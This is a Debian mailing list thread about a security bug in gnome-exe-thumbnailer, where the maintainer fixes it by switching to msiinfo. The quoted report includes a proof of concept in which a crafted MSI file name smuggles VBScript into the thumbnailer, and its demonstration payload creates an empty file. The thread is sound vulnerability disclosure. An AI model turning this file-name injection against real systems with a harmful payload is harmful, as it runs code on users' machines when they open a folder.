I like that the patch is less code. Deleted code is debugged code! Btw, are you sure that using mssiinfo does not introduce new bugs?
Cheers, Nils James Lu <bitfl...@gmail.com> writes: > [ Unknown signature status ] > Hi Nils, > > I wasn't able to reproduce the exploit on my (64-bit) system with either > Caja and Nautilus (it also required setting up a new wineprefix in > ~/.wine). The msi thumbnail ended up generating without any version > information tag at all. > > Regardless, I've gone and replaced the VBScript-based parsing entirely > with msitools' msiinfo in > https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5; > hopefully this should fix the issue. I'll tag a new release soon and > look at pushing the fix to Debian. > > (Also CC'ing the other maintainers, who I don't think are on the Debian > Wine list) > > Best, > James > > On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote: >> Package: gnome-exe-thumbnailer >> Version: 0.9.4-2 >> Severity: grave >> Tags: security >> Justification: user security hole >> >> Dear Maintainer, >> >> the following PoC is copied verbatim from my post about the parsing issue: >> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html >> >> Proof of Concept >> >> Install Dependencies >> >> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus >> and wixl. The wixl package is only needed to create MSI files that trigger >> the thumbnailer. >> >> If the proof of concept does not work, install winetricks and run winetricks >> wsh56 to upgrade the Windows Script Host. >> >> Create MSI Files >> >> Create a file named poc.xml with the following content: >> >> <?xml version="1.0" encoding="utf-8"?> >> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi";> >> <Product Version="1.0"/> >> </Wix> >> >> Execute the following Bourne Shell code: >> >> wixl -o poc.msi poc.xml >> cp poc.msi "poc.msi\",0):Set >> fso=CreateObject(\"Scripting.FileSystemObject\"):Set >> poc=fso.CreateTextFile(\"badtaste.txt\")'.msi" >> >> Trigger Execution >> >> Start GNOME Files and navigate to the folder with the MSI files. An empty >> file with the name badtaste.txt should appear. >> >> *** End of the template - remove these template lines *** >> >> >> -- System Information: >> Debian Release: 9.0 >> APT prefers stable >> APT policy: (500, 'stable') >> Architecture: i386 (i686) >> >> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core) >> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) >> Shell: /bin/sh linked to /bin/dash >> Init: sysvinit (via /sbin/init) >> >> Versions of packages gnome-exe-thumbnailer depends on: >> ii icoutils 0.31.2-1.1 >> ii imagemagick 8:6.9.7.4+dfsg-11 >> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11 >> ii libglib2.0-bin 2.50.3-2 >> >> Versions of packages gnome-exe-thumbnailer recommends: >> pn wine >> <none> >> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev >> <none> >> >> gnome-exe-thumbnailer suggests no packages. >> >> -- no debconf information >> >> _______________________________________________ >> pkg-wine-party mailing list >> pkg-wine-pa...@lists.alioth.debian.org >> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party >> > -- Nils Dagsson Moskopp // erlehmann <http://dieweltistgarnichtso.net>
signature.asc
Description: PGP signature
